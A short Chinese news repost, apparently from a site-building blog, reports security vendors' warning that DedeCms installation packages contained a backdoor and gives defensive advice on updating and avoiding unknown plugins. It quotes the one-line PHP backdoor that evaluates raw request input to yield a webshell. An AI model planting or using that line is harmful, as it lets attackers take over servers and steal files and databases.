[ 虎娃导读 ] 最新消息,瑞星与 360 今日对外发布警示,称国内知名的 PHP 开源网站管理系统织梦 CMS(DedeCms)安装包被发现植入后门~
黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库 。
据第三方权威统计数据显示,目前约有 50 万网站使用该dedecms系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等 。
安全界人士分析发现,此类文件被植入一句后门代码“@eval (file_get_contents ('php://input'));”,黑客只需要构造简单的数据包提交到服务器,就能够获取到该网站的 WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限,直接访问服务器上的文件、数据库等信息 。
【织梦CMS建站系统被曝漏洞 几十万网站沦为木马网站】下面小熊优化的小编给出一个相关建议:
1、尽快转换系统,可以使用pageadmin、动易、wp这类保持续更新的cms系统、国内一些老牌的cms包括dedecms,phpcms、jtbc等已停止更新了,建议不要使用了 。
2、尽量不要网上下载不知名的插件,尤其使用wp的网站,大多被黑的都是网上乱用插件导致的 。
3、保持系统更新,官方更新的版本及时更新上,不要感觉现在功能够用了就不更新,有时候更新不仅仅是功能更新,也是安全上的更新 。
推荐阅读
- 国内最火的10款Java开源项目 java开源cms系统怎么选择
- 动易cms官方下载功能介绍
- 湖北荆州计划高铁什么时候建站,荆州高铁什么时候通车
- 我来分享sublime text新建站点的具体方法介绍 我来分享你来欣赏
- 为什么高铁不在泸州建站只建宜宾,重庆到泸州高铁在在合江建站吗
- 三门峡高铁南站什么时候建成通车,蒙西铁路在三门峡建站吗啥时候开工
- 免费搭建网站的软件 智能建站软件下载
- CMS平台全称 cms是什么意思的缩写啊
- 自助建站系统个人网站 建站软件有哪些